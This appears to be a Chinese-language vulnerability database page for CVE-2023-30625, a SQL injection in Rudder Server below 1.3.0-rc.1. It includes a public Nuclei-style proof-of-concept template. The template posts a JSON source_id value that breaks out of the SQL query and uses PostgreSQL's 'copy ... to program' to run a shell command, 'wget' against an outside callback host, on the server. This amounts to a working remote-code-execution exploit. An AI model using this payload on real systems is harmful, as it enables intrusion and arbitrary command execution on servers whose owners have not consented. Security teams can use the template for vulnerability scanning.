CVE-2023-30625: Rudder Server < 1.3.0-rc.1 - SQL Injection

日期: 2025-08-01 | 影响软件: Rudder Server | POC: 已公开

漏洞描述

Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.

PoC代码[已公开]

id: CVE-2023-30625

info:
  name: Rudder Server < 1.3.0-rc.1 - SQL Injection
  author: gy741
  severity: high
  description: |
    Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30625
    - http://packetstormsecurity.com/files/173837/Rudder-Server-SQL-Injection-Remote-Code-Execution.html
    - https://github.com/rudderlabs/rudder-server/commit/0d061ff2d8c16845179d215bf8012afceba12a30
    - https://github.com/rudderlabs/rudder-server/commit/2f956b7eb3d5eb2de3e79d7df2c87405af25071e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-30625
    cwe-id: CWE-89
    epss-score: 0.89911
    epss-percentile: 0.99543
    cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rudderstack
    product: rudder-server
  tags: cve,cve2023,packetstorm,rudder,rudderstack,sqli,vkev,vuln
variables:
  cmd: "wget {{interactsh-url}}"

http:
  - raw:
      - |
        POST /v1/warehouse/pending-events HTTP/1.1
        Host: {{Hostname}}

        {"source_id": "test'; copy (SELECT '') to program '{{cmd}}'-- - "}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "error getting pending"

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: status
        status:
          - 500
# digest: 490a004630440220313a1edf374c775e77ffabd3bb5ab767c1b54de0d2bfeda9bf3681480618134802207e986f7b91f719661f2701eb527c579d4bcb04f186f32efed21fa5a9dfbb30a7:922c64590222798bb761d5b6d8e72950

相关漏洞推荐